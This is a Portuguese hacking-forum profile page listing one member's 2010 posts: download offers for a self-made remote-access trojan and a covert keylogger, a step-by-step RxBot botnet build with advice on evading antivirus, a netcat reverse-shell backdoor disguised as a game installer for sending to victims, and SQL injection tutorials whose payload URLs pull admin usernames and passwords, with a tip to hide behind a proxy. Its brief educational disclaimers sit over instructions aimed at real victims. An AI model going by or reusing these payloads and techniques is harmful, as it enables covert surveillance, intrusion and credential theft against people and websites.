Menu

Mostrar postagens

Esta seção permite que você visualize todas as postagens feitas por este membro. Observe que você só pode ver postagens feitas em áreas às quais tem acesso atualmente.

Menu Mostrar postagens

Mensagens - rahackzin

#1
Malware | Cracking | Hacker Tools / Master Rat 1.0
05 de Julho , 2010, 08:06:07 PM


Master Rat 1.0

Master Rat é uma ferramenta de administração remota (RAT). Com o Master Rat 1.0 você poderá executar diversas ações em um computador alvo, além de monitorá-lo. Seu uso é totalmente gratuíto, e é expressamente proíbida sua venda. Tudo o que for feito é de sua responsabilidade, portanto use com sabedoria, e procure saber as consequências  da má utilização deste RAT.

Funções:

  • Informações sobre a Vítima
  • Gerenciador de Processos
  • Gerenciador de Janelas
  • Mensagem
  • Remote Shell
  • Keylogger
  • Executar Batch Script
  • Downloader
  • ... e mais outras!
Informações:
Autor: Rahackzin
Tamanho: 1,34 MB
Ano: 2010
Licença: Freeware
Categoria: RAT
Download: http://www.4shared.com/file/SIZRU_92/Master_Rat_10.html
Senha: 123456

Gostaria de saber o que vocês acharam!
#2
Penetration Tests / Re:[Tutorial] Botnet - RxBot 6.5
24 de Março , 2010, 12:40:16 PM
Exatamente, pois o bot irá se conectar ao canal do IRC, e não você ao bot!
#3
Penetration Tests / [Tutorial] Botnet - RxBot 6.5
22 de Março , 2010, 02:58:06 PM
- Introdução

Fiz este tutorial com o intuito de passar conhecimento para a comunidade, e não para fins maliciosos!
Irei fazer uma breve introdução sobre o que são botnets!
Para quem não sabe, botnets são uma rede de máquinas infectadas por um botnet, assim podendo chamá-las de "máquinas zumbis", ou simplemente "bots"!
A pessoa que controla as máquinas infectadas, chamado de Bot Master, conecta-se a elas através de canais da rede IRC, na maioria das vezes. Os ataques mais comuns envolvendo botnets, são os de DDoS (Negação de serviço) e spamming.
A imagem abaixo mostra esquematicamente como funcionam as botnets:



- Downloads

-> Cliente mIRC - Download
O Cliente mIRC será utilizado para nos conectarmos com os bots.

-> RxBot 6.5 - Download
O RxBot é um botnet ótimo, em C++. Ele possui as mais variadas funções, como scanning, cmd remoto, DDoS e muitas outras!

-> Visual C++ 6.0 - Download
Visual C++ 6 é um compilador de C++ que é recomendado para compilar o RxBot. Eu não testei em versões superiores. Se vocês quiserem, fiquem à vontade e postem o resultado!

-> Microsoft Platform SDK- Download
É grandinho, mas é necessário instalar hehe

SENHA DOS ARQUIVOS: 123456

- Configurando Visual C++ 6.0

Após baixar os arquivos, extraia tudo para algum diretório de fácil acesso. Recomendo no C:\ .
Depois instale o Visual C++ 6 e o Microsoft Platform SDK. Este último pode demorar bastante, e ocupará cerca de  900 mb em seu disco rígido.
Agora precisaremos fazer algumas alterações no compilador.
Iniciem o Visual C++ 6. Na barra de menus, vá em:
Tools -> Options
Abrirá uma janela com 6 abas, então clique em Directories



Irão existir três itens já, então clique no botão de adicionar, e insira mais estes:

C:\Program Files\Microsoft Platform SDK\
C:\Program Files\Microsoft Platform SDK\Bin\
C:\Program Files\Microsoft Platform SDK\Include\
C:\Program Files\Microsoft Platform SDK\Lib\

OBS.: Se você não instalar neste diretório procure-o.


Depois disto de OK.

- Configurando o RxBot

Agora que já configuramos o Visual C++ 6, podemos configurar o RxBot! Para isto, vamos em File -> Open.


Iremos até a pasta que extraimos o RxBot, e nela, procuraremos o arquivo: configs.h
Este arquivo é o responsável por obter nossas informações, que farão o bot conectar ao IRC.
Ao abri-lo, procurem estas duas linhas:

Nela, vocês devem colocar a porta do IRC. A padrão é a 6667.

Agora vocês devem ir um pouco mais para baixo da página, e procurar as seguintes linhas:


Na imagem está tudo comentado, mas explicarei melhor os campos obrigatórios:

botid: simplismente o ID do bot
version: é a versão do bot
password: a senha que você utilizará para logar-se no bot
server: servidor do IRC
serverpass: senha do server IRC, caso possua uma
channel: canal do IRC
channelpass: senha do canal, caso possua uma
filename: arquivo do bot
keylogfile: logs do keylogger
valuename: descrição do arquivo
nickconst: é a primeira parte do nick do bot
szLocalPayloadFile: local em que o payload que será criado
modeonconn: parametros do server
exploitchan: canal do IRC
keylogchan: canal do IRC
psniffchan: canal do IRC


Depois de vocês terem configurado de acordo com seus dados, vocês podem salvar o arquivo. Após salvá-lo, vá em File -> Open Workspace

Abra o arquivo rBot.dsw
Quando você abrir, no canto esquerdo da tela procure o arquivo configs.h e veja se ele está como você salvou.


Caso esteja, você pode prosseguir para o próximo passo. Caso contrário, edite novamente.

Agora que tudo está pronto, falta apenas compilar o bot.


Clique em Build rBot.exe. Agora será criada a pasta Debug onde você extraiu os arquivos, onde conterá o executável.

- Infectando e Logando

Após você criar o servidor, você pode passá-lo no Themida (um antigo amigo hehe), para ele ficar indetectável pelo aVast, sem corromper.
Depois que você infectar a vítima, você deverá ir no mIRC, no canal que você configurou, para logar-se no bot.
Para logar, você deve fazer o seguinte:
.login 123456 <- No meu caso o "123456" é a senha que eu determinei nas configurações.
Os comandos do bot estão em um arquivo .html junto à pasta do RxBot!



- Conclusão

Nesta matéria, eu passei o conceito básico de botnets, e um simples exemplo de como utilizar um. Tudo que foi feito aqui foi testado em uma máquina virtual, e eu recomendo que vocês façam o mesmo. Gostaria de agradecer também ao meu amigo Skyze por me emprestar seu canal no IRC.
Espero que vocês tenham gostado!

Créditos: Rahackzin
#4
Malware | Cracking | Hacker Tools / Re:SpyThis Keylogger 0.3
22 de Março , 2010, 02:16:51 PM
Citação de: GiGaPLay online 12 de Março , 2010, 12:41:03 PM
   Como eu faço pra enviar ele sem que outra pessoa, descubra que estou enviando virus?
Crie o servidor, passe um crypter ou binder que o deixe indetectável sem corromper e envie para a pessoa. :)
#5
Penetration Tests / Netcat - Criando um simples Backdoor
25 de Fevereiro , 2010, 03:02:54 PM
::: Introdução :::

O Netcat é uma ferramenta muito cobiçada. Ele pode ser utilizado desde simples funções de telnet, até um backdoor de conexão reversa. Por estas diversas funções, é conhecido também como um "Canivete Suiço" hacker. Na maioria dos sistemas operacionais Linux, o Netcat já vem incluso.
Tendo criatividade, pode-se utilizá-lo como diversas técnicas, entre elas um sniffer e até um brute force!
Nesta matéria iremos criar um backdoor de conexão reversa, que nos dará acesso à shell, ou seja, o cmd.exe! Também configuraremos um arquivo SFX, o qual conterá o netcat e o comando após a execução, que será mandado para a vítima como se fosse um servidor.

::: Ferramentas Necessárias :::

Para a matéria serão necessárias as seguintes ferramentas:

Netcat: http://joncraton.org/files/nc111nt.zip
Winrar: http://www.baixaki.com.br/download/WinRAR.htm

::: Instalando o Netcat :::

Para instalar o Netcat, basta extrair os arquivos para a pasta C:\Windows\System32\
Para chamá-lo, basta ir ao cmd e digitar nc + os comandos

::: O Servidor :::

Após você ter baixado e instalado as ferramentas necessárias, vamos criar o arquivo SFX, o nosso servidor.
Para isto, selecione o arquivo nc.exe, e com o botão direito do mouse, clique em Adicionar para o arquivo...



Em Nome do arquivo, escolha um nome para o arquivo (sem tirar a extensão), no meu caso coloquei "Game". Depois no canto inferioro direito, marque a opção Criar arquivo SFX.



Depois, na aba Avançado clique em Opções SFX...



Irá abrir a janela Opções avançadas do SFX. Na aba Geral siga os seguintes procedimentos. No campo de texto Caminho para extração digite C:\Windows\System32\ que é o diretório para instalar o netcat. Depois, no campo de texto Executar após a extração digite:
nc -d 127.0.0.1 999 -e cmd.exe
Agora vamos explicar...
O comando -d fará o netcat rodar em modo background
Onde eu coloquei 127.0.0.1 você deverá colocar seu ip
O 999 é a porta utilizada, que poderá ser a sua escolha
O comando -e cmd.exe fará executar o cmd.exe ao ser executado... ou seja, você oberá a shell da vítima.



Na aba Métodos marque a opção Ocultar tudo



Depois, na aba Atualizar em Método de atualização marque Extrair e substituir arquivos. Mais embaixo, em Métodos de substituição marque a opção Substituir todos os arquivos



Agora podemos personalizar um pouco nosso servidor. Para isto iremos modificar o ícone... Na aba Texto e Ícone em cima do campo de texto Carregar ícone SFX do arquivo clique no botão Procurar para procurar o ícone. No meu caso utilizarei um dado :)



Agora que terminamos de configurar o SFX podemos clicar no OK para aplicarmos as configurações e novamente em OK para criarmos o arquivo!
Podem ver no desktop que foi criado o arquivo Game.sfx!

Pronto, temos o servidor pronto!


::: Cliente :::

Agora que nosso servidor está pronto, temos que deixar o Netcat em escuta na porta que escolhemos no servidor. No meu caso foi a porta 999.
Para isto, devemos abrir o cmd, e digitar:
nc -L -n -p 999 -vv
Vamos explicar agora o código!
O comando -L irá entrar em modo de escuta, e se a conexão encerrar, tentará reconectar.
O comando -n determina que pode ser utilizado apenas números.
O -p 999 é para determinar a porta.
O -vv é para preparar a conexao quando fexada.

Depois de deixar o netcat em modo de escuta na porta 999 irá aparecer a seguinte mensagem:
Listenning on [any] 999...
Abaixo tem a imagem demonstrando.


Feito isso, você pode enviar para a vítima o arquivo SFX, e então terá acesso ao cmd dela :)

::: Conclusão :::

Nesta matéria vocês aprenderam como criar um simples backdoor de conexão reversa utilizando o Netcat. Devo lembrar, que como ele utiliza conexão reversa deverá ser necessário abrir a porta que será utilizada, em seu roteador, ou modem. Esta foi apenas uma demonstração de uma das muitas funções desta incrivel ferramenta que é o Netcat! A matéria foi utilizada em um Windows, mas tem como fazer backdoor's para Linux também utilizando o Netcat.
Criei esta matéria com o intuíto de ensinar, e não de estimular qualquer ação!
Bem, espero que vocês tenham gostado!

Autor: Rahackzin
#6
Penetration Tests / SQL Injection - information_schema
25 de Fevereiro , 2010, 02:48:24 PM
::: INTRODUÇÃO :::

A técnica conhecida como information_chema, é utilizada para descobrir todas as tabelas e colunas existentes no banco de dados. Ela faz o trabalho de programas que auxiliam a exploração do SQL Injection para descobrir as tabelas e as colunas. Com este método você tem sua vida facilitada :)

::: INFORMATION_SCHEMA :::

Como já expliquei para vocês, agora iremos capturar do banco de dados as tabelas e as colunas do banco de dados de um site fictício.
Supomos que temos a seguinte notícias:

www.site.com.br/noticias.php?id=15

Já vimos que ele está vulnerável a SQL Injection e possui 6 colunas. Agora iremos descobrir as tabelas do site através do information_schema, o conteúdo de nossa materia!
Para isto iremos utilizar um union:

www.site.com.br/noticias.php?id=-15+Union+Select+1,2,3,4,5,6+From+Information_Schema.Tables

Notem que apareceram alguns números na tela, no nosso caso: 2,5,3

Agora vamos fazer o seguinte, no lugar destes números iremos colocar as tabelas do information_schema, adicionando um "limite":

http://www.site.com.br/noticias.php?id=-15+Union+Select+1,table_name,3,4,5,6+From+Information_Schema.Tables+limit 0,1

Agora você vai aumentando o limite para 1,1 / 2,1 / 3,1 / 4,1 até encontrar alguma tabela tipo: admin, usuarios, user, membros. administradores, bd_admin, db_admin etc...

Vamos supor agora que encontramos a tabela "usuarios" em 20,1:

http://www.site.com.br/noticias.php?id=-15+Union+Select+1,table_name,3,4,5,6+From+Information_Schema.Tables+limit 20,1

Agora iremos achar as colunas da tabela "usuarios":

http://www.site.com.br/noticias.php?id=-15+Union+Select+1,Column_name,3,4,5,6+From+Information_Schema.Columns+Where Table.name='usuarios'+limit+0,1
(Lembrando que este método não funcionará se existir filtragem magic quote no site)

Caso a filtragem esteja ativa poderemos utilizar assim e ver uma por uma:

http://www.site.com.br/noticias.php?id=-15+Union+Select+1,Column_name,3,4,5,6+From+Information_Schema.Columns+limit+0,1

E então ir procurando até encontrar as colunas: senha, usuario, username, login, password, user, email etc

Agora vem a melhor parte!
Com a técnica asseguir você irá ter a lista completa de todas as tabelas existentes no banco de dados:

www.site.com.br/noticias.php?id=-15+Union+Select+1,Group_Concat(Table_Name)
,3,4,5,6+from+information_schema.tables+where+table_schema=database()



E com esta, todas as colunas:

www.site.com.br/noticias.php?id=-15+Union+Select+1,Group_concat(table_name)
,3,4,5,6+from+information_schema.columns+where+table_schema=database()



::: CONCLUSÃO :::

Neste tutorial mostrei a vocês como descobrir as tabelas e as colunas de um banco de dados utilizando o information_schema! Com este método você não é obrigado a ir chutando nomes de tabelas e colunas até encontrar ela, ou utilizar algum programa específico. Você faz manualmente. Aí está a verdadeira arte do SQL Injection!
Espero que todos tenham gostado e que ela seja bastante útil!

Autor: Rahackzin
#7
Penetration Tests / Blind SQL Injection - Avançado
25 de Fevereiro , 2010, 02:37:48 PM
::: INTRODUÇÃO :::

Na matéria passada mostrei a vocês como realizar o SQL Injection Clássico e o Union. Agora irei introduzi-los o Blind SQL Injection, técnica que poucos dominam. Uma coisa vocês devem ficar sabendo: é mais complicado que o normal, porém não é nenhum bixo de sete cabeças :)
A técnica Blind SQL é utilizada quando o servidor não retorna nenhum erro ao atacante, porém ele realmente sabe que está vulnerável. Isto dificulta o atacante de explorar a vulnerabilidade, porém quem sabe bem ela, não terá dificuldades. Nesta matéria iremos realizar o básico do Blind SQL Injection, ou traduzindo para o portugues, Injeção SQL Cega rsrsrs
Para o Blind SQL Injection, é necessária a regra dos 2 P's: paciência e persistência.

Agora vamos para a prática!

::: BLIND SQL INJECTION :::

Já que alguns sites quando tentamos realizar um SQLi com Union ou um "clássico", mesmo quando sabemos que estão vulneráveis, não retornam nenhum erro, dificultando a exploração da vulnerabilidade.
Neste tutorial irei usar um site fictício como exemplo hehe :)

Vamos supor que temos o seguinte site, aberto em uma notícia:

www.site.com.br/noticias.php?ID=10

Após scanearmos ele descobrimos que existe uma falha, e está vulnerável a SQL. Até então tudo bem, porém quando tentamos utilizar o comando Union, não é retornado nenhum erro. Sabendo isso iremos tentar utilizar a técnica do Blind SQL Injection. Para isto iremos verificar se ele está vulnerável mesmo:

www.site.com.br/noticias.php?ID=10 And 1=1
(A página carregará normal em todos os casos)

Agora veremos realmente se está vulneravel:

www.site.com.br/noticias.php?ID=10 And 1=2
(Se aparecerem numeros avulços, datas, etc. Ou se tiverem faltando figuras. O site é vulnerável.)

Agora precisaremos descobrir a versão do servidor MySQL.
Para isto utilizaremos SUBSTRINGS.

www.site.com.br/noticias.php?ID=10 And Substring(@@Version,1,1)=5
(Se a versão do MySQL for 5, então o site não retornará erro. A página será carregada normal.)

Agora, se estiver faltando algo, imagens, textos, ou aparecer numeros e datas, a versão do MySQL provavelmente será a 4. Para comprovar isto:

www.site.com.br/noticias.php?ID=10 And Substring(@@Version,1,1)=4
(Se a versão do MySQL for 4, então o site não retornará erro. A página será carregada normal.)

Como já temos a versão do MySQL podemos proceder.
Agora iremos verificar se o comando SUBSELECT funciona. Quando o SELECT não funciona utilizamos ele.

Para verificarmos iremos fazer isto:

www.site.com.br/noticias.php?ID=10 And (Select 1)=1
(Caso a página seja carregada normal, então o SUBSELECT funciona.)

Nesta parte iremos descobrir os nomes das tabelas e das colunas. Iremos usar uma técnica muito utilizada: CHUTE rsrs
Teremos como base os nomes mais comuns, como: admin, users, adm, usuarios, usuario ...

Vamos descobrir a tabela:

www.site.com.br/noticias.php?ID=10 And (Select 1 From admin Limit 0,1)=1
(Se a página carregar normal, sem nada faltando, ou numeros na tela, acertamos a tabela! Caso contrário você deve continuar testando até encontrar a certa)

Para descobrirmos o nome das colunas agora:

www.site.com.br/noticias.php?ID=10 And (Select Substring(Concat(1,Senha),1,1) From Admin Limit 0,1)=1
(Então, se a página carregar normal, é porque a coluna Senha existe na tabela Admin!)

Então vamos verificar se a coluna Usuario existe:

www.site.com.br/noticias.php?ID=10 And (Select Substring(Concat(1,Usuario),1,1) From Admin Limit 0,1)=1
(Então, se a página carregar normal, é porque a coluna Usuario existe na tabela Admin!)

Vamos supor que deu certo as colunas Usuario e Senha na tabela Admin. Então precisamos descobrir estes dados.
Esta parte é mais complicada, e demorada. Teremos que descobrir letra por letra dos campos, em ASCII. Por isto recomendo este site, que possui o alfabeto inteiro em ASCII:

http://easycalculation.com/ascii-hex.php

Para descobrirmos os dados, faremos assim:

www.site.com.br/noticias.php?ID=10 And ASCII(Substring((SELECT Concat(Usuario,0x3a,Senha) From Admin Limit 0,1),1,1))>65

No código acima nós iremos descobrir a primeira letra em ASCII da coluna Usuario da tabela Admin. Reparem que está ">65". O "65" é o equivalente ao "A" em ASCII. Então deveremos ir incrementando ele até o servidor retornar o erro. O número antes do erro é o nosso caractere.
Assim se desse erro seria algo parecido "maior que 65"

Para quem não entendeu a explicação vai um exemplo...

Ex:

>95 - Erro
>96 - Erro
>97 - Página carregada normal.

Assim nosso caractere em ASCII é o 97, equivalente ao "a".

Vamos então descobrir o segundo caractere:

www.site.com.br/noticias.php?ID=10 And ASCII(Substring((SELECT Concat(Usuario,0x3a,Senha) From Admin Limit 0,1),2,1))>65

Fomos incrementando até o 112, que significa "p".
Então temos "ap".
Para descobrir também quantos caracteres possuem basta ir incrementando o "2,1", "3,1" até a página não ser carregada com sucesso!

Agora você só precisa incrementar mais! Vou parar por aqui hehe!

::: CONCLUSÃO :::

A técnica Blind SQL Injection é mais complicada do que a do SQL Injection Clássico, como puderam perceber na matéria acima. Fiz ela com o intuito de passar a vocês o conhecimento da fantástica técnica que é o SQL Injection :) Quando bem explorada pode ser fatal.
Blind SQL Injection exige muito estudo, e persistência, porque você obrigatóriamente precisa fazer o servidor revelar a você letra por letra do usuario, senha etc. Mesmo podendo fazer tudo manualmente, existem diversos programas que facilitam muito a vida de todos que utilizam a técnica do SQL Injection!
Espero que todos tenham gostado do tutorial, e que ele sirva como fonte de estudo para muitos!

Autor: Rahackzin
#8
Penetration Tests / SQL Injection - Nivel Básico
25 de Fevereiro , 2010, 02:27:55 PM
::: INTRODUÇÃO :::

O SQL Injection, consta em explorar vulnerabilidades em servidores que utilizam banco de dados como o MySQL. SQL Injection é utilizado para obter informações "sigilosas", como versão do database, senha de admin, usuário de admin, e assim vai. Basta saber explorar a falha.
Atualmente, a vulnerabilidade mais comum em aplicações web é o SQL Injection. Está presente em sites de lojas, de notícias, e em alguns sites lammers, que utilizam o banco de dados.
O método mais simples de SQL é utilizando as famosas "Strings", que são injetadas nos campos de usuário e senha para confundir o banco de dados, e automaticamente liberar o acesso ao admin. Apesar de simples, está dificil de utilizar esta maneira atualmente.


::: SQL CLÁSSICO :::

Este método é o mais famoso, e é conhecido por muitos, porém não é todo mundo que consegue obter uma série de dados do banco de dados.
Vamos começar :)

Imagine se agente estiver navegando por um site, e ele tiver uma área destinada à noticias... Se fosse no ponto de vista de algum usuário comum de computador, não faria nada, apenas leria as noticias do dia. Mas então, se quem estivesse visitando o site fosse alguém que estivesse aprendendo SQL Injection, ou que já soubesse, verificaria a URL.
Este usuário que está interessado em explorar a vulnerabilidade, verá que tem a seguinte URL aquela notícia:

http://www.sitedenoticias.com.br/noticias.php?id=73

Ao ver isto, certamente ele irá checar se o site é vulnerável a SQL Injection.
Para isto, ele insere uma ' depois do ID da notícia, ficando assim a URL:


http://www.sitedenoticias.com.br/noticias.php?id=73';

Como o site estava vulnerável, foi retornado o seguinte erro:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Caso o site não estivesse vulneravel, não seria retornado nenhum erro.

Agora que o usuário percebeu que o site estava vulnerável à SQL Injection, ele deverá checar o numero de colunas. Para isto ele utilizará o ORDER BY!
Para utilizar o ORDER BY, ele irá incrementando o número de possíveis colunas até ser retornado um erro!


http://www.sitedenoticias.com.br/noticias.php?id=73 ORDER BY 1

Como não foi retornado nenhum erro, ele foi incrementando o número de possíveis colunas

http://www.sitedenoticias.com.br/noticias.php?id=73 ORDER BY 2
http://www.sitedenoticias.com.br/noticias.php?id=73 ORDER BY 3
http://www.sitedenoticias.com.br/noticias.php?id=73 ORDER BY 4
http://www.sitedenoticias.com.br/noticias.php?id=73 ORDER BY 5
http://www.sitedenoticias.com.br/noticias.php?id=73 ORDER BY 6
http://www.sitedenoticias.com.br/noticias.php?id=73 ORDER BY 7


Quando ele chegou ao 7, foi retornado o seguinte erro:

Unknown column '7' in 'order clause'

Então, descobrimos que existem apenas 6 colunas!

Agora que temos o número de colunas, utilizaremos o comando UNION para descobrirmos as informações!
Primeiramente, deveremos adicionar um hífen - antes do ID da notícia, ficando assim:

http://www.sitedenoticias.com.br/noticias.php?id=-73

Agora, vamos utilizar o número de colunas que descobrimos anteriormente, para descobrirmos a versão do banco de dados!

http://www.sitedenoticias.com.br/noticias.php?id=-73 UNION ALL SELECT 1,2,3,4,5,6

Irá ser retornado alguns números. Vamos supor que foi retornado o: 2 o 3 e o 5.

Então faremos assim:

http://www.sitedenoticias.com.br/noticias.php?id=-73 UNION ALL SELECT 1,version(),3,4,5,6

Então onde se encontrava o 2 apareceu a versão do banco de dados, que no caso foi:

5.0.45-community-nt, que é a versão.

Vamos descobrir o nome do banco de dados também! Para isto façam o seguinte:

http://www.sitedenoticias.com.br/noticias.php?id=-73 UNION ALL SELECT 1,database(),3,4,5,6

Foi retornado o seguinte nome: ULT_NOTICIAS


Feito isto, agora iremos obter o nome das tabelas e das colunas!

Os nomes mais comuns para as tabelas são: admin, user, usuario, administrador, administrator, usuarios

Já os mais comuns para colunas são: senha, login, pass, usuario, user, pwd, password, usuarios

Vamos checar então se a tabela admin existe:

http://www.sitedenoticias.com.br/noticias.php?id=-73 UNION ALL SELECT 1,2,3,4,5,6 from admin

Como nenhum erro foi retornado, descobrimos que ela existe! Caso contrário apareceria um erro mais ou menos assim:

Table 'ult_noticias.admin' doesn't exist

Agora que nosso aprendiz de SQL descobriu a tabela, ele irá tentar descobrir o usuário e a senha da área administrativa! Com este objetivo ele inseriu as seguintes colunas:

http://www.sitedenoticias.com.br/noticias.php?id=-73 UNION ALL SELECT 1,usuario,senha,4,5,6 from admin

Nenhum erro foi retornado, e no local onde aparecia um "2" apareceu "giulian" e onde estava o "3" apareceu "unicornio".

Se as colunas estivessem erradas o erro retornado seria mais ou menos assim:

Unknown column 'usuario' in 'field list'

Agora nosso usuário que explorou a vulnerabilidade de SQL Injection no site de notícias acessa a área administrativa do site utilizando o usuário e a senha que obteve!
Neste caso ele obteu sorte, pois não pegou nenhuma senha, ou algum dado criptografado.
Acho que falarei um pouco sobre isto em outro tópico, para este não ficar muito extenso! hehe

Este foi o SQL Injection Clássico!


::: SQL UNION :::

Agora que acabamos de ver sobre o SQL Clássico iremos ver um exemplo de SQL Injection utilizando apenas o comando Union!
Este pode ser visto como mais simples que o outro, mas depende do ponto de vista :)
Vamos começar com o SQL Injection com o comando UNION então!
Se formos comparar o Union com o clássico veremos que há semelhanças pois utilizam um estilo mais ou menos parecido... Eu não vou explicar muito a respeito dos erros pois já dei uma visão superficial no SQL Injection Clássico! Vamos lá...

Agora, nosso usuário aprendiz está visitando um site de loja virtual, e se depara que cada produto possuí um ID próprio, então, como ele gosta de passar por novas experiências, irá tentar explorar novamente uma Injeção SQL rsrs!

A URL do produto que ele estava olhando era:

http://www.supermercado.com/Loja/produto.php?ID=12

Então, para ver se o site era vulnerável ele colocou o ', e foi retornado o erro:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Agora ele irá descobrir o número de colunas, colocando o hífen na frente do ID:

http://www.supermercado.com/Loja/produto.php?ID=-12 Group by 100

Será retornado o erro:

Unknown column '100' in 'group statement'

Agora então, ele diminui para 10

Retornou erro.

Agora para 5...

http://www.supermercado.com/Loja/produto.php?ID=-12 Group by 5



Unknown column '5' in 'group statement'

Novamente foi retornado o erro.

Logo em seguida decresceu para 4, porém não houve nenhum erro!
Acabamos de descobrir que existem apenas 4 colunas!

Então vamos verifiicar o nome do banco de dados, e a versão!

Primeiramente

http://www.supermercado.com/Loja/produto.php?ID=-45 union select 1,2,3,4

Como foram retornados as colunas 2 e 4 faremos o seguinte:

http://www.supermercado.com/Loja/produto.php?ID=-45 union select 1,database(),3,version()[/color]

Na coluna 2 foi retornado: VIRTUAL_STORE
Na coluna 4 foi retornado: 5.0.45-community-nt

Pronto, agora vamos descobrir o nome das colunas e das tabelas! As mais usadas eu já citei no método clássico de SQL Injection hehe!

Vamos descobrir se a tabela usuarios e as colunas senha e user existem!

http://www.supermercado.com/Loja/produto.php?ID=-45 Union Select 1,user,3,senha from usuarios

Na mosca! Não foi retornado erro, e então ele obteve o usuário e a senha da área administrativa novamente!
Agora ele poderia entrar e fazer o que desejasse, porém, como foi motivo de testes e estudos, ele apenas enviou um email para o administrador, contatando a vulnerabilidade!


::: CONCLUSÃO :::

Neste tutorial vimos como explorar o básico da vulnerabilidade SQL Injection, obtendo algumas informações sobre o banco de dados, e também ganhando acesso à área administrativa com os dados de usuário e senha obtidos na exploração da vulnerabilidade! hehe
Todos sites e informações utilizados neste tutorial são fictícios, dando apenas uma idéia superficial de como realizar um SQL Injection! Os dois métodos que vimos, se bem explorados, podem obter muitos dados sobre algum site!
Este tutorial foi criado para ensinar os métodos básicos de SQLi! E sempre que você for realizar alguma invasão deve utilizar um proxy, para não se expor!

Espero que vocês tenham gostado deste tutorial e que ele seja muito útil!

Autor: Rahackzin
#9
Malware | Cracking | Hacker Tools / SpyThis Keylogger 0.3
25 de Fevereiro , 2010, 02:17:43 PM


SpyThis Keylogger 0.3 é um keylogger que monitora tudo que é digitado no seu computador ocultamente. Os logs são gravados em um arquivo de texto, que é enviado para seu email no tempo que você configurou.
A configuração do servidor é muito simples e rápida.
Se você deseja monitorar outra pessoa, basta zipar o servidor criado e enviar para ela através de MSN, email ou da maneira desejada!

Idioma: Português
Ano: 2010
Autor: Rahackzin
Tamanho: 1.2mb
Download: http://www.4shared.com/file/234221607/958ed779/SpyThisk_Keylogger03.html
Senha: spythis

Não me responsabilizo por seus atos